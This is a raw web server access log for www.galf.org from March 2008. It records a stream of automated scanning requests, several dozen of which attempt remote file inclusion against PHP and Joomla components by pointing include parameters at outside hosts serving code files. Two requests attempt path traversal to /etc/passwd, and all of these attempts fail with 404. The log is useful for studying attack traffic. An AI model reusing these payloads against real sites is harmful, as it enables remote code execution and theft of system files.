69.10.154.114 - - [16/Mar/2008:17:00:16 -0700] "GET /logs/access_071015.log/index.php?option=com_expose&Itemid=&mosConfig_absolute_path=https://www.sunshinefarm.net/cart/images/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.10.154.114 - - [16/Mar/2008:17:00:16 -0700] "GET /index.php?option=com_expose&Itemid=&mosConfig_absolute_path=https://www.sunshinefarm.net/cart/images/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
218.150.160.162 - - [16/Mar/2008:17:01:01 -0700] "GET //tags.php?BBCodeFile=http://www.freewebtown.com/crxr/cp?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.galf.org"
218.150.160.162 - - [16/Mar/2008:17:01:01 -0700] "GET /logs//tags.php?BBCodeFile=http://www.freewebtown.com/crxr/cp?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.galf.org"
69.10.154.114 - - [16/Mar/2008:17:01:04 -0700] "GET /logs/access_070917.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=https://www.sunshinefarm.net/cart/images/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
218.150.160.162 - - [16/Mar/2008:17:01:06 -0700] "GET //tags.php?BBCodeFile=http://www.freewebtown.com/perocs/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.galf.org"
218.150.160.162 - - [16/Mar/2008:17:01:06 -0700] "GET /logs//tags.php?BBCodeFile=http://www.freewebtown.com/perocs/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.galf.org"
84.18.207.65 - - [16/Mar/2008:17:01:36 -0700] "GET /logs/access_070709.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
84.18.207.65 - - [16/Mar/2008:17:01:36 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
84.18.207.65 - - [16/Mar/2008:17:01:36 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
84.18.207.65 - - [16/Mar/2008:17:01:36 -0700] "GET /logs/access_070806.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
195.58.242.138 - - [16/Mar/2008:17:01:51 -0700] "GET /logs/access.log/admin.php?include_path=http://h1.ripway.com/mala/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
195.58.242.138 - - [16/Mar/2008:17:01:52 -0700] "GET /admin.php?include_path=http://h1.ripway.com/mala/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
195.58.242.138 - - [16/Mar/2008:17:01:52 -0700] "GET /logs/admin.php?include_path=http://h1.ripway.com/mala/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
62.141.48.120 - - [16/Mar/2008:17:01:59 -0700] "GET /logs/access_070820.log/nav.php?p=http://www.techbomb.com/fastmicrowave/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
195.58.242.138 - - [16/Mar/2008:17:02:03 -0700] "GET /logs/access_071015.log/skin/zero_vote/ask_password.php?dir=http://h1.ripway.com/mala/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.239.175.35 - - [16/Mar/2008:17:02:04 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.newarkfirefighterspipeband.com/calendar/ws/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
213.239.175.35 - - [16/Mar/2008:17:02:05 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.newarkfirefighterspipeband.com/calendar/ws/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
195.58.242.138 - - [16/Mar/2008:17:02:27 -0700] "GET /logs/access.log/dmin.php?include_path=http://h1.ripway.com/mala/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
62.141.48.120 - - [16/Mar/2008:17:02:58 -0700] "GET /logs/access_070917.log/nav.php?p=http://www.techbomb.com/fastmicrowave/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
69.93.48.162 - - [16/Mar/2008:17:03:44 -0700] "GET /logs/access.log/index.php?nic=ftp://84.32.137.157/incoming/upload/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
69.93.48.162 - - [16/Mar/2008:17:03:44 -0700] "GET /index.php?nic=ftp://84.32.137.157/incoming/upload/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
69.93.48.162 - - [16/Mar/2008:17:03:44 -0700] "GET /logs/index.php?nic=ftp://84.32.137.157/incoming/upload/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
38.119.215.66 - - [16/Mar/2008:17:04:09 -0700] "GET /logs/access_071015.log/index2.php?page=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
212.25.95.194 - - [16/Mar/2008:17:04:52 -0700] "GET /logs/index3.php?pag=http://chyna.sufx.net/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.galf.org"
212.25.95.194 - - [16/Mar/2008:17:04:52 -0700] "GET /index3.php?pag=http://chyna.sufx.net/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.galf.org"
72.55.133.237 - - [16/Mar/2008:17:05:14 -0700] "GET /logs/access_071022.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.55.133.237 - - [16/Mar/2008:17:05:15 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
74.52.2.130 - - [16/Mar/2008:17:05:19 -0700] "GET /logs/access_070924.log/index.php?option=com_phpshop&Itemid=&mosConfig_absolute_path=http://www.dominpe.com/images/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.52.2.130 - - [16/Mar/2008:17:05:19 -0700] "GET /logs/index.php?option=com_phpshop&Itemid=&mosConfig_absolute_path=http://www.dominpe.com/images/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.10.154.114 - - [16/Mar/2008:17:05:20 -0700] "GET /logs/access.log//vwar//convert/mvcw.php?step=1&vwar_root=https://www.sunshinefarm.net/cart/images/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.10.154.114 - - [16/Mar/2008:17:05:20 -0700] "GET //vwar//convert/mvcw.php?step=1&vwar_root=https://www.sunshinefarm.net/cart/images/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
158.75.35.9 - - [16/Mar/2008:17:05:20 -0700] "GET /logs/access_070730.log/modules/My_eGallery/index.php?basepath=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.10.154.114 - - [16/Mar/2008:17:05:20 -0700] "GET /logs//vwar//convert/mvcw.php?step=1&vwar_root=https://www.sunshinefarm.net/cart/images/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.52.2.130 - - [16/Mar/2008:17:05:20 -0700] "GET /logs/access_071022.log/index.php?option=com_phpshop&Itemid=&mosConfig_absolute_path=http://www.dominpe.com/images/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.93.43.34 - - [16/Mar/2008:17:06:24 -0700] "GET /modules/My_eGallery/index.php?basepath=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
69.93.43.34 - - [16/Mar/2008:17:06:24 -0700] "GET /modules/My_eGallery/index.php?basepath=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
72.36.235.74 - - [16/Mar/2008:17:07:06 -0700] "GET /index.php?option=com_phpshop&Itemid=&mosConfig_absolute_path=http://www.dominpe.com/images/echo2? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
88.204.37.199 - - [16/Mar/2008:17:07:18 -0700] "GET /logs/access_071217.log/convert/mvcw.php?step=1&vwar_root=http://www.ossec.net/wiki/index.php/Safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
88.204.37.199 - - [16/Mar/2008:17:07:19 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://www.ossec.net/wiki/index.php/Safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
88.204.37.199 - - [16/Mar/2008:17:07:19 -0700] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://www.ossec.net/wiki/index.php/Safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
195.58.242.138 - - [16/Mar/2008:17:07:34 -0700] "GET /dmin.php?include_path=http://h1.ripway.com/mala/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
216.134.212.72 - - [16/Mar/2008:17:08:36 -0700] "GET /logs/access_070903.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://anjink.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
77.232.66.107 - - [16/Mar/2008:17:08:42 -0700] "GET /logs/access_080114.log//modules/vwar/admin/admin.php?vwar_root=http://www.phanom.ac.th/msnlist/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.93.48.162 - - [16/Mar/2008:17:08:42 -0700] "GET /logs/access_071217.log/components/com_performs/performs.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
69.93.48.162 - - [16/Mar/2008:17:08:42 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
77.232.66.107 - - [16/Mar/2008:17:08:42 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.phanom.ac.th/msnlist/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.93.48.162 - - [16/Mar/2008:17:08:42 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
77.232.66.107 - - [16/Mar/2008:17:08:42 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.phanom.ac.th/msnlist/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
216.134.212.72 - - [16/Mar/2008:17:08:47 -0700] "GET /logs/access_080114.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://anjink.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
200.181.141.54 - - [16/Mar/2008:17:08:54 -0700] "GET /logs/access_071022.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.newarkfirefighterspipeband.com/calendar/ws/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.181.141.54 - - [16/Mar/2008:17:09:00 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.newarkfirefighterspipeband.com/calendar/ws/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.181.141.54 - - [16/Mar/2008:17:09:06 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.newarkfirefighterspipeband.com/calendar/ws/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.35.225.138 - - [16/Mar/2008:17:09:14 -0700] "GET /logs/access_071015.log/index.php?option=com_expose&Itemid=&mosConfig_absolute_path=https://www.sunshinefarm.net/cart/images/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.35.225.138 - - [16/Mar/2008:17:09:14 -0700] "GET /index.php?option=com_expose&Itemid=&mosConfig_absolute_path=https://www.sunshinefarm.net/cart/images/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.35.225.138 - - [16/Mar/2008:17:09:16 -0700] "GET /logs/index.php?option=com_expose&Itemid=&mosConfig_absolute_path=https://www.sunshinefarm.net/cart/images/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.35.225.138 - - [16/Mar/2008:17:10:23 -0700] "GET /logs/access.log//vwar//convert/mvcw.php?step=1&vwar_root=https://www.sunshinefarm.net/cart/images/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.35.225.138 - - [16/Mar/2008:17:10:23 -0700] "GET //vwar//convert/mvcw.php?step=1&vwar_root=https://www.sunshinefarm.net/cart/images/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.35.225.138 - - [16/Mar/2008:17:10:23 -0700] "GET /logs//vwar//convert/mvcw.php?step=1&vwar_root=https://www.sunshinefarm.net/cart/images/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
64.92.172.194 - - [16/Mar/2008:17:10:28 -0700] "GET /logs/access_071015.log//index.php?arquivo=http://64.92.172.194/~root/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
64.92.172.194 - - [16/Mar/2008:17:10:28 -0700] "GET //index.php?arquivo=http://64.92.172.194/~root/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
64.92.172.194 - - [16/Mar/2008:17:10:28 -0700] "GET /logs//index.php?arquivo=http://64.92.172.194/~root/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.93.48.162 - - [16/Mar/2008:17:10:33 -0700] "GET /logs/access_080225.log/components/com_performs/performs.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
158.75.35.9 - - [16/Mar/2008:17:11:23 -0700] "GET /index.php?nic=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
209.210.236.16 - - [16/Mar/2008:17:11:31 -0700] "GET //includes/archive/archive_topic.php?phpbb_root_path=http://isnova.madeiratecnopolo.pt/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.galf.org"
209.210.236.16 - - [16/Mar/2008:17:11:33 -0700] "GET /logs//includes/archive/archive_topic.php?phpbb_root_path=http://isnova.madeiratecnopolo.pt/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.galf.org"
64.92.172.194 - - [16/Mar/2008:17:12:22 -0700] "GET /logs/access_071231.log//index.php?arquivo=http://64.92.172.194/~root/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
62.44.73.116 - - [16/Mar/2008:17:13:21 -0700] "GET /logs/access_080114.log/index.php?mode=http://www.discapacidadesecuador.org/cache/.ownz/safeon.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
62.44.73.116 - - [16/Mar/2008:17:13:21 -0700] "GET /logs/access_080114.log/index.php?mode=http://www.discapacidadesecuador.org/cache/.ownz/safeon.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
62.44.73.116 - - [16/Mar/2008:17:13:22 -0700] "GET /logs/index.php?mode=http://www.discapacidadesecuador.org/cache/.ownz/safeon.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
62.44.73.116 - - [16/Mar/2008:17:13:22 -0700] "GET /logs/index.php?mode=http://www.discapacidadesecuador.org/cache/.ownz/safeon.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
195.58.242.138 - - [16/Mar/2008:17:14:44 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://h1.ripway.com/mala/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.35.225.138 - - [16/Mar/2008:17:15:28 -0700] "GET /logs/access_070917.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=https://www.sunshinefarm.net/cart/images/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
212.25.95.194 - - [16/Mar/2008:17:15:35 -0700] "GET /logs/access_070716.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.newarkfirefighterspipeband.com/calendar/ws/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
84.18.207.65 - - [16/Mar/2008:17:15:35 -0700] "GET /logs/access_070709.log//components/com_minibb.php?absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
84.18.207.65 - - [16/Mar/2008:17:15:35 -0700] "GET //components/com_minibb.php?absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
212.25.95.194 - - [16/Mar/2008:17:15:35 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.newarkfirefighterspipeband.com/calendar/ws/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
84.18.207.65 - - [16/Mar/2008:17:15:35 -0700] "GET /logs//components/com_minibb.php?absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
212.25.95.194 - - [16/Mar/2008:17:15:36 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.newarkfirefighterspipeband.com/calendar/ws/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
213.239.175.35 - - [16/Mar/2008:17:16:01 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.newarkfirefighterspipeband.com/calendar/ws/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
84.18.207.65 - - [16/Mar/2008:17:16:11 -0700] "GET /logs/access_071008.log//components/com_minibb.php?absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
213.239.175.35 - - [16/Mar/2008:17:16:11 -0700] "GET /logs/access_070716.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.newarkfirefighterspipeband.com/calendar/ws/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
213.239.175.35 - - [16/Mar/2008:17:16:11 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.newarkfirefighterspipeband.com/calendar/ws/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
213.239.175.35 - - [16/Mar/2008:17:16:11 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.newarkfirefighterspipeband.com/calendar/ws/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.55.133.237 - - [16/Mar/2008:17:16:26 -0700] "GET /logs/access_070917.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
213.239.175.35 - - [16/Mar/2008:17:16:29 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.freewebtown.com/crxr/cp?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.galf.org"
213.239.175.35 - - [16/Mar/2008:17:16:29 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.freewebtown.com/crxr/cp?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.galf.org"
213.239.175.35 - - [16/Mar/2008:17:16:29 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.freewebtown.com/perocs/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.galf.org"
213.239.175.35 - - [16/Mar/2008:17:16:30 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.freewebtown.com/perocs/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.galf.org"
209.85.114.4 - - [16/Mar/2008:17:16:39 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.freewebtown.com/crxr/cp?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.galf.org"
209.85.114.4 - - [16/Mar/2008:17:16:39 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.freewebtown.com/crxr/cp?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.galf.org"
209.85.114.4 - - [16/Mar/2008:17:16:39 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.freewebtown.com/perocs/test.txt??? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.galf.org"
209.85.114.4 - - [16/Mar/2008:17:16:39 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.freewebtown.com/perocs/test.txt??? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.galf.org"
212.25.95.194 - - [16/Mar/2008:17:16:41 -0700] "GET /logs/access_071001.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.newarkfirefighterspipeband.com/calendar/ws/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
200.181.141.54 - - [16/Mar/2008:17:16:53 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.newarkfirefighterspipeband.com/calendar/ws/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
212.25.95.194 - - [16/Mar/2008:17:17:00 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.newarkfirefighterspipeband.com/calendar/ws/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.51.24.224 - - [16/Mar/2008:17:17:02 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://isnova.madeiratecnopolo.pt/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.galf.org"
72.51.24.224 - - [16/Mar/2008:17:17:03 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://isnova.madeiratecnopolo.pt/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.galf.org"
195.58.242.138 - - [16/Mar/2008:17:17:27 -0700] "GET /logs/access_080114.log//modules/vwar/admin/admin.php?vwar_root=http://h1.ripway.com/mala/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
195.58.242.138 - - [16/Mar/2008:17:17:27 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://h1.ripway.com/mala/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
195.58.242.138 - - [16/Mar/2008:17:17:42 -0700] "GET /logs/access_071217.log//modules/vwar/admin/admin.php?vwar_root=http://h1.ripway.com/mala/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
209.210.236.16 - - [16/Mar/2008:17:17:43 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://isnova.madeiratecnopolo.pt/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.galf.org"
87.118.108.246 - - [16/Mar/2008:17:17:53 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.mambembrincantes.com/site/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
84.18.207.65 - - [16/Mar/2008:17:18:29 -0700] "GET /logs//components/com_minibb.php?absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
84.18.207.65 - - [16/Mar/2008:17:18:30 -0700] "GET //components/com_minibb.php?absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.93.43.34 - - [16/Mar/2008:17:18:40 -0700] "GET /logs/access_070730.log/modules/My_eGallery/index.php?basepath=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
69.93.43.34 - - [16/Mar/2008:17:18:40 -0700] "GET /logs/access_070730.log/modules/My_eGallery/index.php?basepath=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
213.239.175.35 - - [16/Mar/2008:17:18:43 -0700] "GET /logs/access_071001.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.newarkfirefighterspipeband.com/calendar/ws/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
80.190.134.206 - - [16/Mar/2008:17:19:00 -0700] "GET //index2.php?id=../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.galf.org"
80.190.134.206 - - [16/Mar/2008:17:19:00 -0700] "GET /logs//index2.php?id=../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.galf.org"
62.44.73.116 - - [16/Mar/2008:17:19:02 -0700] "GET /logs//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.discapacidadesecuador.org/cache/.ownz/safeon.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
62.44.73.116 - - [16/Mar/2008:17:19:02 -0700] "GET //modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.discapacidadesecuador.org/cache/.ownz/safeon.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
72.30.226.171 - - [16/Mar/2008:17:19:10 -0700] "GET /logs/access_071231.log HTTP/1.0" 200 720896 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
